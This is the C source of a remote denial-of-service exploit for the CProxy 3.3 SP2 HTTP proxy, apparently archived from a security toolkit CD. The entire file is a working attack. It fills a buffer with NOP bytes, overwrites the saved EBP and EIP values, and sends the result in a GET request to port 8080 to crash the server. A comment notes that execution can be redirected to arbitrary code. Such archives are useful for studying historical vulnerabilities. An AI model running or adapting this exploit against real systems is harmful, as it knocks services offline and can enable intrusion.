home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / cproxy / cproxy.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.4 KB  |  109 lines
  1. /*
  2.  * Remote Denial of Service for CProxy v3.3 - Service Pack 2
  3.  * 
  4.  * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
  5.  *
  6.  *
  7.  * This program xploits an overflow vulnerability in CProxy 3.3 SP2
  8.  * HTTP Service (8080), causing server shutdown
  9.  *
  10.  * Greetings to all the other members and all my friends :) 
  11.  */
  12.  
  13. #include <stdio.h>
  14. #include <stdlib.h>
  15. #include <unistd.h>
  16. #include <sys/socket.h>
  17. #include <sys/types.h>
  18. #include <netdb.h>
  19. #include <netinet/in.h>
  20. #include <arpa/inet.h>
  21.  
  22. #define BUFFERSIZE 247
  23. #define NOP 0x90
  24. // If you change this values you can change EIP and EBP values
  25. // to redirect to a code that you want >;)
  26. #define EIP 0x61616161
  27. #define EBP 0x61616161
  28.  
  29. void usage(char *progname)
  30. {
  31.   fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
  32.   exit(1);
  33. }
  34.  
  35. int main(int argc, char **argv)
  36. {
  37.   char *ptr,buffer[BUFFERSIZE], remotedos[1024];
  38.   unsigned long *long_ptr,eip=EIP, ebp=EBP;
  39.   int aux,sock;
  40.   struct sockaddr_in sin;
  41.   unsigned long ip;
  42.   struct hostent *he;
  43.  
  44.   fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
  45.  
  46.   if (argc<2) usage(argv[0]);
  47.  
  48.   if (argc>=3) eip+=atol(argv[2]);
  49.  
  50.   if (argc>=4) ebp+=atol(argv[3]);
  51.  
  52.   ptr=buffer;
  53.   memset(ptr,0,sizeof(buffer));
  54.   memset(ptr,NOP,sizeof(buffer)-8);
  55.   ptr+=sizeof(buffer)-8;
  56.   long_ptr=(unsigned long*)ptr;
  57.   *(long_ptr++) = ebp;
  58.   *(long_ptr++) = eip;
  59.   ptr=(char *)long_ptr;
  60.   *ptr='\0';
  61.  
  62.   bzero(remotedos, sizeof(remotedos));
  63.   snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);
  64.  
  65.   if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
  66.     {
  67.       perror("socket()");
  68.       return -1;
  69.     }
  70.  
  71.   if ((he = gethostbyname(argv[1])) != NULL)
  72.     {
  73.       ip = *(unsigned long *)he->h_addr;
  74.     }
  75.   else
  76.     {
  77.       if ((ip = inet_addr(argv[1])) == NULL)
  78.         {
  79.           perror("inet_addr()");
  80.           return -1;
  81.         }
  82.     }
  83.  
  84.   sin.sin_family = AF_INET;
  85.   sin.sin_addr.s_addr = ip;
  86.   sin.sin_port = htons(8080);
  87.  
  88.   fprintf(stderr,"\nEngaged...\n");
  89.   if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
  90.     {
  91.       perror("connect()");
  92.       return -1;
  93.     }
  94.  
  95.   if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos))
  96.     {
  97.       perror("write()");
  98.       return -1;
  99.     }
  100.  
  101.   fprintf(stderr,"Bye Bye baby!...\n\n");
  102.   if (close(sock) < 0)
  103.     {
  104.       perror("close()");
  105.       return -1;
  106.     }
  107.   return(0);
  108. }
  109. /*                    www.hack.co.za           [18 May 2000]*/